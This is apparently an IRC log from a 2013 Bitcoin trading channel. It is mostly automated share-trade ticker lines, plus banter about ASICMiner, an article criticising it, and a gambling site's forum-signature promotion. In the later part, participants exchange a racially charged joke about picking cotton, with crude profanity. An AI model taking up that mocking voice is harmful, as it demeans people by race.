[HAVELOCK] [XBOND] 3197 @ 0.00119999 = 3.8364 BTC [-] Aug 27 22:13:27 [BTCTC] [DMS.MINING] 4 @ 0.0036 = 0.0144 BTC [+] Aug 27 22:14:41 [HAVELOCK] [XBOND] 1149 @ 0.0012 = 1.3788 BTC [+] Aug 27 22:14:44 [HAVELOCK] [XBOND] 3000 @ 0.0012 = 3.6 BTC [+] Aug 27 22:14:46 [HAVELOCK] [XBOND] 3000 @ 0.0012 = 3.6 BTC [+] Aug 27 22:15:04 [BTCTC] [LABCOIN] 91 @ 0.003685 = 0.3353 BTC [-] Aug 27 22:15:07 [BTCTC] [DMS.MINING] 23 @ 0.00366 = 0.0842 BTC [+] Aug 27 22:15:51 [BTCTC] [LABCOIN] 53 @ 0.003694 = 0.1958 BTC [+] Aug 27 22:15:54 [BTCTC] [LABCOIN] 95 @ 0.003694 = 0.3509 BTC [+] Aug 27 22:15:55 [BTCTC] [LABCOIN] 715 @ 0.003695 = 2.6419 BTC [+] Aug 27 22:15:56 [BTCTC] [LABCOIN] 500 @ 0.003699 = 1.8495 BTC [+] Aug 27 22:15:57 [BTCTC] [LABCOIN] 3446 @ 0.0037 = 12.7502 BTC [+] Aug 27 22:16:49 que "Amazing company" Aug 27 22:17:02 http://www.coindesk.com/bitmine-to-drop-4phs-of-asic-power-onto-bitcoin-network-before-april/ Aug 27 22:17:14 "MASSIVE LUCK INVESTMENTS" Aug 27 22:17:30 These Chinese companies crack me up. Aug 27 22:17:40 brother can you spare me a petahash? Aug 27 22:17:46 lol Aug 27 22:17:54 before which april ? Aug 27 22:18:18 [BTCTC] [DMS.MINING] 1 @ 0.00366 BTC [+] Aug 27 22:18:31 [BTCTC] [BASIC-MINING] 2 @ 0.2199 = 0.4398 BTC [-] Aug 27 22:18:52 [BTCTC] [HOSTED-MINING] 80 @ 0.00279 = 0.2232 BTC [-] Aug 27 22:20:37 A senior spokesperson for Massive Luck, who asked not to be named, said: heh Aug 27 22:22:01 anyway, i am penning an article, which will be published within a coupla hours. The title is "The analysis of a failure : Asicminer". get your popcorns ready. Aug 27 22:22:19 [HAVELOCK] [AM100] 1 @ 0.0262 BTC [-] Aug 27 22:23:31 [HAVELOCK] [XBOND] 100 @ 0.0013 = 0.13 BTC [+] Aug 27 22:23:39 [HAVELOCK] [XBOND] 93 @ 0.00132 = 0.1228 BTC [+] Aug 27 22:23:48 [HAVELOCK] [XBOND] 27 @ 0.00135 = 0.0365 BTC [+] Aug 27 22:23:57 [HAVELOCK] [XBOND] 34 @ 0.0014 = 0.0476 BTC [+] Aug 27 22:24:01 [HAVELOCK] [XBOND] 2 @ 0.0014235 = 0.0028 BTC [+] Aug 27 22:24:03 oh fuck- this is too funny Aug 27 22:24:07 “When the difficulty level is relatively low (the first 4-5 months of the life cycle) it can be set to TURBO mode, mining at 40GH/chip, 0.75W/GH, Aug 27 22:24:44 I better go dig that turbo button off that 386 Aug 27 22:24:57 i love turbo mode Aug 27 22:25:54 [BTCTC] [ACTIVEMINING] 1 @ 0.005313 BTC [+] Aug 27 22:25:55 [BTCTC] [ACTIVEMINING] 1 @ 0.005314 BTC [+] Aug 27 22:25:56 [BTCTC] [ACTIVEMINING] 3 @ 0.00539 = 0.0162 BTC [+] Aug 27 22:25:58 [BTCTC] [ACTIVEMINING] 9 @ 0.005394 = 0.0485 BTC [+] Aug 27 22:27:06 [BTCTC] [ACTIVEMINING] 31 @ 0.005394 = 0.1672 BTC [+] Aug 27 22:27:17 [HAVELOCK] [AM100] 1 @ 0.0262 BTC [-] Aug 27 22:28:03 [BTCTC] [HOSTED-MINING] 100 @ 0.00265 = 0.265 BTC [-] Aug 27 22:28:05 [BTCTC] [HOSTED-MINING] 100 @ 0.00265 = 0.265 BTC [-] Aug 27 22:28:06 [BTCTC] [HOSTED-MINING] 40 @ 0.002623 = 0.1049 BTC [-] Aug 27 22:28:07 [BTCTC] [HOSTED-MINING] 146 @ 0.002622 = 0.3828 BTC [-] Aug 27 22:29:31 As the difficulty increases, it can be adjusted to the REGULAR mode, mining at 30GH/chip, 0.5W/GH.” Finally, as difficulty scales, the chip can throttle back to a 20Gh ultra-low power mode at 0.35w/chip. Aug 27 22:29:45 That makes no fucking sense at all Aug 27 22:33:05 [HAVELOCK] [XBOND] 2 @ 0.0011444 = 0.0023 BTC [-] Aug 27 22:33:21 [BTCTC] [ASICMINER-PT] 1 @ 2.596 BTC [-] Aug 27 22:33:24 [BTCTC] [ASICMINER-PT] 3 @ 2.597 = 7.791 BTC [+] Aug 27 22:33:25 [BTCTC] [ASICMINER-PT] 18 @ 2.6 = 46.8 BTC [+] Aug 27 22:34:05 [BTCTC] [ASICMINER-PT] 1 @ 2.669 BTC [+] Aug 27 22:34:06 [BTCTC] [ASICMINER-PT] 1 @ 2.67 BTC [+] Aug 27 22:34:06 [BTCTC] [ASICMINER-PT] 1 @ 2.676 BTC [+] Aug 27 22:35:02 [BTCTC] [DMS.MINING] 1 @ 0.00366 BTC [+] Aug 27 22:35:48 [BTCTC] [DMS.MINING] 100 @ 0.003669 = 0.3669 BTC [+] Aug 27 22:36:22 [HAVELOCK] [HIM] 1 @ 0.208 BTC [-] Aug 27 22:36:30 [BTCTC] [DMS.MINING] 111 @ 0.00367 = 0.4074 BTC [+] Aug 27 22:36:58 [HAVELOCK] [CFIG] 2 @ 0.21 = 0.42 BTC [+] Aug 27 22:37:47 [BTCTC] [DMS.MINING] 65 @ 0.00368 = 0.2392 BTC [+] Aug 27 22:38:10 [BTCTC] [ACTIVEMINING] 10 @ 0.005177 = 0.0518 BTC [-] Aug 27 22:38:11 [BTCTC] [ACTIVEMINING] 10 @ 0.005176 = 0.0518 BTC [-] Aug 27 22:38:13 [BTCTC] [ACTIVEMINING] 500 @ 0.005172 = 2.586 BTC [-] Aug 27 22:38:14 [BTCTC] [ACTIVEMINING] 37 @ 0.005166 = 0.1911 BTC [-] Aug 27 22:38:15 [BTCTC] [ACTIVEMINING] 520 @ 0.005165 = 2.6858 BTC [-] Aug 27 22:38:15 [BTCTC] [ACTIVEMINING] 5000 @ 0.005163 = 25.815 BTC [-] Aug 27 22:38:16 [BTCTC] [ACTIVEMINING] 156 @ 0.00516 = 0.805 BTC [-] Aug 27 22:38:18 [BTCTC] [ACTIVEMINING] 79 @ 0.005155 = 0.4072 BTC [-] Aug 27 22:40:29 [BTCTC] [ASICMINER-PT] 1 @ 2.678 BTC [+] Aug 27 22:40:30 [BTCTC] [ASICMINER-PT] 1 @ 2.679 BTC [+] Aug 27 22:40:31 [BTCTC] [ASICMINER-PT] 5 @ 2.68 = 13.4 BTC [+] Aug 27 22:40:32 [BTCTC] [ASICMINER-PT] 1 @ 2.692 BTC [+] Aug 27 22:40:34 [BTCTC] [ASICMINER-PT] 3 @ 2.693 = 8.079 BTC [+] Aug 27 22:40:35 [BTCTC] [ASICMINER-PT] 1 @ 2.694 BTC [+] Aug 27 22:43:36 [BTCTC] [DMS.MINING] 1 @ 0.0035 BTC [-] Aug 27 22:43:37 [BTCTC] [DMS.MINING] 45 @ 0.0035 = 0.1575 BTC [-] Aug 27 22:43:56 [MPEX] [S.MPOE] 2388 @ 0.0008735 = 2.0859 BTC [-] Aug 27 22:43:58 [MPEX] [S.MPOE] 1212 @ 0.00087324 = 1.0584 BTC [-] Aug 27 22:45:56 [MPEX] [S.MPOE] 4088 @ 0.00087324 = 3.5698 BTC [-] Aug 27 22:47:52 [HAVELOCK] [AM100] 3 @ 0.0262 = 0.0786 BTC [-] Aug 27 22:48:30 [BTCTC] [TAT.ASICMINER] 2 @ 0.02607 = 0.0521 BTC [+] Aug 27 22:49:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.02607 BTC [+] Aug 27 22:55:19 [BTCTC] [COGNITIVE] 10 @ 0.359 = 3.59 BTC [-] Aug 27 22:55:20 [BTCTC] [COGNITIVE] 35 @ 0.353 = 12.355 BTC [-] Aug 27 22:55:22 [BTCTC] [COGNITIVE] 7 @ 0.3529 = 2.4703 BTC [-] Aug 27 22:57:58 [BTCTC] [ACTIVEMINING] 10 @ 0.005385 = 0.0539 BTC [+] Aug 27 22:57:59 [BTCTC] [ACTIVEMINING] 2 @ 0.005386 = 0.0108 BTC [+] Aug 27 23:00:21 [BTCTC] [DMS.MINING] 1 @ 0.003679 BTC [+] Aug 27 23:00:44 [BTCTC] [ACTIVEMINING] 10 @ 0.005161 = 0.0516 BTC [-] Aug 27 23:00:45 [BTCTC] [ACTIVEMINING] 10 @ 0.005159 = 0.0516 BTC [-] Aug 27 23:00:47 [BTCTC] [ACTIVEMINING] 71 @ 0.005157 = 0.3661 BTC [-] Aug 27 23:00:47 [BTCTC] [ACTIVEMINING] 1921 @ 0.005155 = 9.9028 BTC [-] Aug 27 23:05:38 [BTCTC] [DMS.MINING] 1 @ 0.003599 BTC [-] Aug 27 23:05:40 [BTCTC] [DMS.MINING] 54 @ 0.003599 = 0.1943 BTC [-] Aug 27 23:07:47 [BTCTC] [LABCOIN] 6263 @ 0.00372 = 23.2984 BTC [+] Aug 27 23:09:35 [BTCTC] [LABCOIN] 500 @ 0.003723 = 1.8615 BTC [+] Aug 27 23:09:36 [BTCTC] [LABCOIN] 50 @ 0.003726 = 0.1863 BTC [+] Aug 27 23:09:37 [BTCTC] [LABCOIN] 100 @ 0.00375 = 0.375 BTC [+] Aug 27 23:09:39 [BTCTC] [LABCOIN] 100 @ 0.00375 = 0.375 BTC [+] Aug 27 23:09:40 [BTCTC] [LABCOIN] 200 @ 0.00375 = 0.75 BTC [+] Aug 27 23:09:41 [BTCTC] [LABCOIN] 930 @ 0.003752 = 3.4894 BTC [+] Aug 27 23:10:44 [BTCTC] [LABCOIN] 120 @ 0.003755 = 0.4506 BTC [+] Aug 27 23:10:57 [BTCTC] [TAT.ASICMINER] 2 @ 0.02607 = 0.0521 BTC [+] Aug 27 23:10:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.02608 BTC [+] Aug 27 23:10:59 [BTCTC] [TAT.ASICMINER] 10 @ 0.0261 = 0.261 BTC [+] Aug 27 23:14:26 [BTCTC] [ACTIVEMINING] 2 @ 0.005382 = 0.0108 BTC [+] Aug 27 23:14:55 [BTCTC] [TAT.ASICMINER] 2 @ 0.02639 = 0.0528 BTC [+] Aug 27 23:15:18 [HAVELOCK] [VTX] 16 @ 0.61 = 9.76 BTC [+] Aug 27 23:15:25 [BTCTC] [TAT.ASICMINER] 13 @ 0.02649 = 0.3444 BTC [+] Aug 27 23:15:28 [HAVELOCK] [VTX] 10 @ 0.5919 = 5.919 BTC [-] Aug 27 23:15:44 [HAVELOCK] [VTX] 10 @ 0.591 = 5.91 BTC [-] Aug 27 23:15:47 [BTCTC] [DMS.MINING] 29 @ 0.00351 = 0.1018 BTC [-] Aug 27 23:15:48 [BTCTC] [DMS.MINING] 99 @ 0.0035 = 0.3465 BTC [-] Aug 27 23:15:49 [BTCTC] [DMS.MINING] 1 @ 0.00345 BTC [-] Aug 27 23:15:51 [BTCTC] [DMS.MINING] 8 @ 0.0034 = 0.0272 BTC [-] Aug 27 23:15:51 [BTCTC] [DMS.MINING] 5 @ 0.00335 = 0.0168 BTC [-] Aug 27 23:15:52 [BTCTC] [DMS.MINING] 6 @ 0.003349 = 0.0201 BTC [-] Aug 27 23:15:53 [BTCTC] [DMS.MINING] 50 @ 0.003349 = 0.1675 BTC [-] Aug 27 23:15:54 [BTCTC] [DMS.MINING] 50 @ 0.003349 = 0.1675 BTC [-] Aug 27 23:15:55 [BTCTC] [DMS.MINING] 50 @ 0.003349 = 0.1675 BTC [-] Aug 27 23:15:56 [BTCTC] [DMS.MINING] 50 @ 0.003349 = 0.1675 BTC [-] Aug 27 23:15:57 [BTCTC] [DMS.MINING] 207 @ 0.003348 = 0.693 BTC [-] Aug 27 23:16:03 [HAVELOCK] [VTX] 50 @ 0.58 = 29 BTC [-] Aug 27 23:16:12 [BTCTC] [TAT.ASICMINER] 12 @ 0.02605 = 0.3126 BTC [-] Aug 27 23:16:41 [BTCTC] [DMS.MINING] 1 @ 0.003348 BTC [-] Aug 27 23:16:43 [BTCTC] [DMS.MINING] 6 @ 0.003348 = 0.0201 BTC [-] Aug 27 23:17:16 [BTCTC] [TAT.ASICMINER] 10 @ 0.02701 = 0.2701 BTC [+] Aug 27 23:18:20 [BTCTC] [TAT.ASICMINER] 2 @ 0.02558 = 0.0512 BTC [-] Aug 27 23:18:21 [BTCTC] [DMS.SELLING] 10 @ 0.0123 = 0.123 BTC [+] Aug 27 23:18:22 [BTCTC] [TAT.ASICMINER] 6 @ 0.02559 = 0.1535 BTC [+] Aug 27 23:19:15 [BTCTC] [TAT.ASICMINER] 6 @ 0.0256 = 0.1536 BTC [+] Aug 27 23:20:12 [BTCTC] [TAT.ASICMINER] 4 @ 0.02561 = 0.1024 BTC [+] Aug 27 23:21:15 [BTCTC] [TAT.ASICMINER] 20 @ 0.02562 = 0.5124 BTC [+] Aug 27 23:21:30 [BTCTC] [ASICMINER-PT] 1 @ 2.554 BTC [-] Aug 27 23:21:32 [BTCTC] [ASICMINER-PT] 1 @ 2.553 BTC [-] Aug 27 23:21:33 [BTCTC] [ASICMINER-PT] 8 @ 2.55 = 20.4 BTC [-] Aug 27 23:21:34 [BTCTC] [ASICMINER-PT] 10 @ 2.55 = 25.5 BTC [-] Aug 27 23:21:35 [BTCTC] [ASICMINER-PT] 5 @ 2.513 = 12.565 BTC [-] Aug 27 23:21:37 [BTCTC] [ASICMINER-PT] 1 @ 2.512 BTC [-] Aug 27 23:21:37 [BTCTC] [ASICMINER-PT] 1 @ 2.511 BTC [-] Aug 27 23:21:38 [BTCTC] [ASICMINER-PT] 2 @ 2.51 = 5.02 BTC [-] Aug 27 23:21:39 [BTCTC] [ASICMINER-PT] 1 @ 2.51 BTC [-] Aug 27 23:21:40 [BTCTC] [ASICMINER-PT] 1 @ 2.509 BTC [-] Aug 27 23:21:41 [BTCTC] [ASICMINER-PT] 1 @ 2.509 BTC [-] Aug 27 23:21:42 [BTCTC] [ASICMINER-PT] 8 @ 2.507 = 20.056 BTC [-] Aug 27 23:21:43 [BTCTC] [ASICMINER-PT] 6 @ 2.502 = 15.012 BTC [-] Aug 27 23:21:44 [BTCTC] [ASICMINER-PT] 7 @ 2.501 = 17.507 BTC [-] Aug 27 23:21:46 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] Aug 27 23:21:47 [BTCTC] [ASICMINER-PT] 15 @ 2.5 = 37.5 BTC [-] Aug 27 23:21:48 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] Aug 27 23:21:48 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] Aug 27 23:21:49 [BTCTC] [ASICMINER-PT] 7 @ 2.5 = 17.5 BTC [-] Aug 27 23:21:50 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] Aug 27 23:21:51 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] Aug 27 23:21:52 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] Aug 27 23:21:53 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] Aug 27 23:22:31 [BTCTC] [TAT.ASICMINER] 10 @ 0.02701 = 0.2701 BTC [+] Aug 27 23:22:40 [MPEX] [S.MPOE] 9900 @ 0.00087322 = 8.6449 BTC [-] Aug 27 23:23:30 [BTCTC] [TAT.ASICMINER] 10 @ 0.02698 = 0.2698 BTC [-] Aug 27 23:23:43 [BTCTC] [ACTIVEMINING] 10 @ 0.005151 = 0.0515 BTC [-] Aug 27 23:26:09 sooo Aug 27 23:26:16 what did i miss Aug 27 23:26:42 [BTCTC] [TAT.ASICMINER] 24 @ 0.02563 = 0.6151 BTC [-] Aug 27 23:27:06 http://trilema.com/2013/the-analysis-of-a-failure-asicminer/ Aug 27 23:27:08 there we go. Aug 27 23:27:09 The analysis of a failure : Asicminer pe Trilema - Un blog de Mircea Popescu. Aug 27 23:27:54 [BTCTC] [TAT.ASICMINER] 25 @ 0.02711 = 0.6778 BTC [+] Aug 27 23:28:44 ;;later tell fractal https://bitcointalk.org/index.php?topic=250249.msg3019433#msg3019433 seems maybe you were wrong ? Aug 27 23:28:45 The operation succeeded. Aug 27 23:29:10 [BTCTC] [TAT.ASICMINER] 23 @ 0.02567 = 0.5904 BTC [-] Aug 27 23:30:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.02569 BTC [+] Aug 27 23:32:17 [BTCTC] [TAT.ASICMINER] 2 @ 0.02568 = 0.0514 BTC [-] Aug 27 23:33:16 [BTCTC] [TAT.ASICMINER] 26 @ 0.0271 = 0.7046 BTC [+] Aug 27 23:33:39 You missed this totally awesome success https://bitcointalk.org/index.php?topic=223474.0 Aug 27 23:34:15 [BTCTC] [TAT.ASICMINER] 4 @ 0.02559 = 0.1024 BTC [-] Aug 27 23:35:07 hey, like the lowest concentration of stupid shit being said on btctalk ever Aug 27 23:35:23 [HAVELOCK] [AM100] 5 @ 0.0258 = 0.129 BTC [-] Aug 27 23:36:46 [HAVELOCK] [AM100] 91 @ 0.0258999 = 2.3569 BTC [+] Aug 27 23:36:49 [HAVELOCK] [AM100] 3 @ 0.026 = 0.078 BTC [+] Aug 27 23:37:57 [BTCTC] [LABCOIN] 24 @ 0.003685 = 0.0884 BTC [-] Aug 27 23:37:58 [BTCTC] [LABCOIN] 1 @ 0.00361 BTC [-] Aug 27 23:38:00 [BTCTC] [LABCOIN] 5 @ 0.003609 = 0.018 BTC [-] Aug 27 23:38:01 [BTCTC] [LABCOIN] 40 @ 0.003607 = 0.1443 BTC [-] Aug 27 23:38:22 today's trilema blog tldr: those dicks refuse to list on my awesome romanian exchange, waaaaahh!!! Aug 27 23:38:30 According to tracking, I'd say the campaign is a success so far. Aug 27 23:39:17 [BTCTC] [TAT.ASICMINER] 15 @ 0.02511 = 0.3767 BTC [-] Aug 27 23:39:56 toffoo you musta read a diff post. Aug 27 23:39:59 [BTCTC] [TAT.ASICMINER] 4 @ 0.02561 = 0.1024 BTC [+] Aug 27 23:40:01 [BTCTC] [TAT.ASICMINER] 18 @ 0.02562 = 0.4612 BTC [+] Aug 27 23:40:05 :-) Aug 27 23:40:07 no just reading between the lines Aug 27 23:40:07 Namworld it's like 300 signatures for 100 btc neh ? Aug 27 23:40:25 [BTCTC] [TAT.ASICMINER] 4 @ 0.02562 = 0.1025 BTC [+] Aug 27 23:40:34 https://www.xcrowd.co.uk/mining/home.html#link3 Aug 27 23:40:37 XCrowd Home Aug 27 23:40:38 Scrat was it worth it ? Aug 27 23:40:55 yep Aug 27 23:41:18 cool Aug 27 23:41:21 [HAVELOCK] [AM100] 3 @ 0.0259999 = 0.078 BTC [-] Aug 27 23:41:23 [BTCTC] [TAT.ASICMINER] 20 @ 0.02716 = 0.5432 BTC [+] Aug 27 23:41:34 that link alone already made 100 btc Aug 27 23:42:06 It self covered and to win, people need to keep signatures and have 100 posts by the end of the year. Aug 27 23:42:23 xcrowd lol Aug 27 23:42:36 [BTCTC] [TAT.ASICMINER] 18 @ 0.02569 = 0.4624 BTC [-] Aug 27 23:42:40 the insurance is what gets me lol Aug 27 23:42:45 noval idea Aug 27 23:42:49 Namworld i think i don't get something there. how does it self cover ? Aug 27 23:43:15 [BTCTC] [TAT.ASICMINER] 15 @ 0.02571 = 0.3857 BTC [+] Aug 27 23:43:23 Well I just mean the expense covered itself in playing. Aug 27 23:43:23 Rulother yeah, the novel idea of buying fire insurance from your landlord. that way if his property burns down he'll sell property that burned down and pay you for your shit. Aug 27 23:43:40 a a. Aug 27 23:43:48 Right Aug 27 23:44:08 wait. so you're telling me you've tracked people played worth ~10k btc to that forum link ?! Aug 27 23:44:23 yes Aug 27 23:44:23 Almost, yes Aug 27 23:44:38 It's unknown how much repeat customer that made new anonymous accounts without using the link tho. If they kept playing. Aug 27 23:44:49 well pretty impressive then. Aug 27 23:44:50 [BTCTC] [LABCOIN] 2 @ 0.003736 = 0.0075 BTC [+] Aug 27 23:44:51 [BTCTC] [LABCOIN] 2 @ 0.003737 = 0.0075 BTC [+] Aug 27 23:44:58 And of course it doesn't end until 2014 Aug 27 23:45:12 [BTCTC] [TAT.ASICMINER] 19 @ 0.02564 = 0.4872 BTC [-] Aug 27 23:45:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.02579 BTC [+] Aug 27 23:45:16 So plenty room for more gambling + unknown repear users Aug 27 23:45:17 [BTCTC] [ACTIVEMINING] 17 @ 0.005292 = 0.09 BTC [+] Aug 27 23:45:17 [BTCTC] [ACTIVEMINING] 17 @ 0.005293 = 0.09 BTC [+] Aug 27 23:45:36 Well it certainly got Coinroll shown all over the forum. Aug 27 23:45:44 [BTCTC] [DMS.SELLING] 35 @ 0.01263 = 0.4421 BTC [+] Aug 27 23:45:45 [BTCTC] [DMS.SELLING] 300 @ 0.01264 = 3.792 BTC [+] Aug 27 23:46:11 im blown away by the concept that the whole forum still has 10k. Aug 27 23:46:13 When you think about the forum ads prices (2-10 BTC per, rotated) that keep getting auctioned and how little they're seen/clicked Aug 27 23:46:14 [BTCTC] [TAT.ASICMINER] 26 @ 0.02709 = 0.7043 BTC [+] Aug 27 23:46:26 that's true. Aug 27 23:46:43 50 btc when inaba plays Aug 27 23:47:12 [BTCTC] [TAT.ASICMINER] 15 @ 0.02511 = 0.3767 BTC [-] Aug 27 23:47:14 [BTCTC] [TAT.ASICMINER] 15 @ 0.0251 = 0.3765 BTC [-] Aug 27 23:47:15 [BTCTC] [TAT.ASICMINER] 47 @ 0.02502 = 1.1759 BTC [-] Aug 27 23:47:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.02501 BTC [-] Aug 27 23:47:17 [BTCTC] [TAT.ASICMINER] 21 @ 0.025 = 0.525 BTC [-] Aug 27 23:47:19 [BTCTC] [TAT.ASICMINER] 30 @ 0.025 = 0.75 BTC [-] Aug 27 23:47:20 [BTCTC] [TAT.ASICMINER] 21 @ 0.025 = 0.525 BTC [-] Aug 27 23:48:06 [BTCTC] [TAT.ASICMINER] 15 @ 0.02696 = 0.4044 BTC [+] Aug 27 23:49:18 [HAVELOCK] [XBOND] 3 @ 0.0014 = 0.0042 BTC [+] Aug 27 23:49:32 [BTCTC] [BASIC-MINING] 5 @ 0.2107 = 1.0535 BTC [-] Aug 27 23:50:49 [BTCTC] [ASICMINER-PT] 1 @ 2.514 BTC [+] Aug 27 23:50:51 [BTCTC] [ASICMINER-PT] 2 @ 2.513 = 5.026 BTC [-] Aug 27 23:50:52 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] Aug 27 23:50:53 [BTCTC] [ASICMINER-PT] 1 @ 2.482 BTC [-] Aug 27 23:50:55 [BTCTC] [ASICMINER-PT] 2 @ 2.481 = 4.962 BTC [-] Aug 27 23:50:56 [BTCTC] [ASICMINER-PT] 19 @ 2.48 = 47.12 BTC [-] Aug 27 23:50:57 [BTCTC] [ASICMINER-PT] 1 @ 2.48 BTC [-] Aug 27 23:51:29 [BTCTC] [ASICMINER-PT] 1 @ 2.454 BTC [-] Aug 27 23:51:30 [BTCTC] [ASICMINER-PT] 4 @ 2.454 = 9.816 BTC [-] Aug 27 23:51:31 [BTCTC] [ASICMINER-PT] 6 @ 2.454 = 14.724 BTC [-] Aug 27 23:51:46 [BTCTC] [DMS.SELLING] 65 @ 0.01265 = 0.8223 BTC [+] Aug 27 23:52:52 [BTCTC] [DMS.PURCHASE] 5 @ 0.01601 = 0.0801 BTC [+] Aug 27 23:53:07 [BTCTC] [DMS.PURCHASE] 310 @ 0.01601 = 4.9631 BTC [+] Aug 27 23:53:16 [BTCTC] [TAT.ASICMINER] 43 @ 0.02501 = 1.0754 BTC [-] Aug 27 23:53:18 [BTCTC] [TAT.ASICMINER] 479 @ 0.025 = 11.975 BTC [-] Aug 27 23:53:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.0242 BTC [-] Aug 27 23:53:20 [BTCTC] [TAT.ASICMINER] 10 @ 0.0241 = 0.241 BTC [-] Aug 27 23:53:21 [BTCTC] [TAT.ASICMINER] 30 @ 0.024 = 0.72 BTC [-] Aug 27 23:53:23 [BTCTC] [TAT.ASICMINER] 25 @ 0.024 = 0.6 BTC [-] Aug 27 23:53:23 [BTCTC] [TAT.ASICMINER] 20 @ 0.024 = 0.48 BTC [-] Aug 27 23:53:24 [BTCTC] [TAT.ASICMINER] 60 @ 0.024 = 1.44 BTC [-] Aug 27 23:53:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.024 BTC [-] Aug 27 23:53:26 [BTCTC] [TAT.ASICMINER] 55 @ 0.0239 = 1.3145 BTC [-] Aug 27 23:53:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.02351 BTC [-] Aug 27 23:53:28 [BTCTC] [TAT.ASICMINER] 10 @ 0.0235 = 0.235 BTC [-] Aug 27 23:53:29 [BTCTC] [TAT.ASICMINER] 12 @ 0.0232 = 0.2784 BTC [-] Aug 27 23:53:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.0232 BTC [-] Aug 27 23:53:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.0231 BTC [-] Aug 27 23:53:33 [BTCTC] [TAT.ASICMINER] 10 @ 0.0231 = 0.231 BTC [-] Aug 27 23:53:34 [BTCTC] [TAT.ASICMINER] 130 @ 0.02302 = 2.9926 BTC [-] Aug 27 23:53:34 [BTCTC] [TAT.ASICMINER] 20 @ 0.02301 = 0.4602 BTC [-] Aug 27 23:53:35 [BTCTC] [TAT.ASICMINER] 41 @ 0.023 = 0.943 BTC [-] Aug 27 23:54:31 [BTCTC] [ACTIVEMINING] 1 @ 0.005288 BTC [-] Aug 27 23:54:32 [BTCTC] [ACTIVEMINING] 1 @ 0.005289 BTC [+] Aug 27 23:56:40 [BTCTC] [DMS.SELLING] 13 @ 0.0124 = 0.1612 BTC [-] Aug 27 23:58:52 [BTCTC] [ASICMINER-PT] 1 @ 2.455 BTC [+] Aug 28 00:00:49 http://blogs.indiewire.com/shadowandact/black-folks-its-time-to-stop-taking-care-of-white-people Aug 28 00:00:51 hear me brothers. Aug 28 00:00:53 Black Folks, It's Time To Stop Taking Care Of White People | Shadow and Act Aug 28 00:01:25 [BTCTC] [ASICMINER-PT] 1 @ 2.455 BTC [+] Aug 28 00:01:27 [BTCTC] [ASICMINER-PT] 1 @ 2.59 BTC [+] Aug 28 00:07:00 [HAVELOCK] [AM100] 88 @ 0.0259999 = 2.288 BTC [-] Aug 28 00:07:16 [HAVELOCK] [AM100] 5 @ 0.026 = 0.13 BTC [+] Aug 28 00:07:50 [HAVELOCK] [AM100] 5 @ 0.026 = 0.13 BTC [+] Aug 28 00:09:21 what the fuck Aug 28 00:09:33 [BTCTC] [TAT.ASICMINER] 5 @ 0.02485 = 0.1243 BTC [+] Aug 28 00:19:32 ? Aug 28 00:25:21 [BTCTC] [ASICMINER-PT] 1 @ 2.541 BTC [-] Aug 28 00:27:13 [BTCTC] [ASICMINER-PT] 1 @ 2.509 BTC [-] Aug 28 00:27:17 http://www.reddit.com/r/BitcoinStocks/comments/1l7rd1/the_analysis_of_a_failure_asicminer/ Aug 28 00:27:19 The analysis of a failure : Asicminer : BitcoinStocks Aug 28 00:27:28 [MPEX] [S.MPOE] 5500 @ 0.00087322 = 4.8027 BTC [-] Aug 28 00:27:34 posted to alternate reddit, let's see what happens Aug 28 00:27:37 just you white folks wait Aug 28 00:27:41 *subreddit Aug 28 00:28:02 whatchu gonna do when we stop pickin your cotton Aug 28 00:28:41 [BTCTC] [LABCOIN] 25 @ 0.003617 = 0.0904 BTC [-] Aug 28 00:28:42 [BTCTC] [LABCOIN] 25 @ 0.003616 = 0.0904 BTC [-] Aug 28 00:28:44 [BTCTC] [LABCOIN] 100 @ 0.003615 = 0.3615 BTC [-] Aug 28 00:28:45 [BTCTC] [LABCOIN] 127 @ 0.003611 = 0.4586 BTC [-] Aug 28 00:28:45 [BTCTC] [LABCOIN] 510 @ 0.00361 = 1.8411 BTC [-] Aug 28 00:28:46 [BTCTC] [LABCOIN] 63 @ 0.003607 = 0.2272 BTC [-] Aug 28 00:29:27 jurov you get downvoted into oblivion ? Aug 28 00:29:39 [BTCTC] [ASICMINER-PT] 1 @ 2.551 BTC [+] Aug 28 00:29:44 http://www.reddit.com/r/BitcoinStocks/comments/1l5ng1/im_new_to_bitcoin_how_does_bitcoin_stocks_work/cbw02vu Aug 28 00:29:46 dub you know, i don't have any cotton on my cock. Aug 28 00:29:46 accountt1234 comments on I'm new to bitcoin. How does bitcoin stocks work? Aug 28 00:29:47 i wash. Aug 28 00:29:59 [BTCTC] [BASIC-MINING] 5 @ 0.2199 = 1.0995 BTC [+] Aug 28 00:30:09 mircea_popescu: you're wrong Aug 28 00:30:22 [BTCTC] [ACTIVEMINING] 7 @ 0.005389 = 0.0377 BTC [+] Aug 28 00:30:23 re: asicminer, I have no clue about your cock attire Aug 28 00:30:24 [BTCTC] [ACTIVEMINING] 31 @ 0.005389 = 0.1671 BTC [+] Aug 28 00:30:25 [BTCTC] [ACTIVEMINING] 31 @ 0.00539 = 0.1671 BTC [+] Aug 28 00:30:26 [BTCTC] [ACTIVEMINING] 481 @ 0.005395 = 2.595 BTC [+] Aug 28 00:30:44 those are not mistakes Aug 28 00:30:46 wrong on which c[o]unt ? Aug 28 00:30:54 [BTCTC] [TAT.ASICMINER] 2 @ 0.02399 = 0.048 BTC [-] Aug 28 00:30:56 [BTCTC] [TAT.ASICMINER] 2 @ 0.024 = 0.048 BTC [+] Aug 28 00:31:54 what you see as failures are legitimate strategies Aug 28 00:32:25 this argument can always be brought about anything. Aug 28 00:33:09 all it requires is a little twisting of the assumptions we work on Aug 28 00:33:24 [BTCTC] [ASICMINER-PT] 1 @ 